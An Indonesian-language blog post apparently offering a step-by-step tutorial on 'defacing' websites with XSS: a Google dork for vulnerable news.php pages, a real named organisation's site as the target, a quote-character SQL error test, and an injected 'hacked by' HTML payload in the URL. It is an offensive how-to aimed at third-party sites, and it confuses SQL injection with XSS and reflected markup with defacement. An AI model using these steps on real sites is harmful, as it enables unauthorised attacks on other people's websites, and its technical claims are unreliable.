Deface dengan metode XSS
Helo guys kali ini xhteam akan memberikan tutorial cara deface metode xss atau sering disebut sebagai cross site scripting attack adalah metode dimana penyerang memasukkan script html kedalam website yang menjadi korbannya. Ok langsung ke tutorialnya...
Cara deface XSS
1. Dorking di google
inurl:news.php?id= (kembangkan biar dapat yang fresh)
inurl:news.php?id= (kembangkan biar dapat yang fresh)
2.pilih lah salah satu situs.
Saya menggunakan
http://www.indiandiasporacouncil.org/news.php?id=86
Saya menggunakan
http://www.indiandiasporacouncil.org/news.php?id=86
3. Masukan tanda ' diakhir url nya. Contohnya :
http://www.indiandiasporacouncil.org/news.php?id=86'
Jika situs nya blank ( tampilan nya warna putih) atau muncul tulisan
http://www.indiandiasporacouncil.org/news.php?id=86'
Jika situs nya blank ( tampilan nya warna putih) atau muncul tulisan
you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near " at line 1
Berarti situs yang menjadi target kita vuln
4. Sekarang coba masukan script html di belakang url tadi <h1> hacked by clone dwiki</h1>. Seperti dibawah ini
http://www.indiandiasporacouncil.org/news.php?id=86%27<h1>hacked%20by%20clone%20dwiki</h1>
http://www.indiandiasporacouncil.org/news.php?id=86%27<h1>hacked%20by%20clone%20dwiki</h1>
5. Selesai 😉
Itu dia cara deface xss mudah sekali bukan. Gunakan dengan bijak. Tutorial kali ini hanya sebagai pembelajaran saja
Baca Juga
Post a Comment
Post a Comment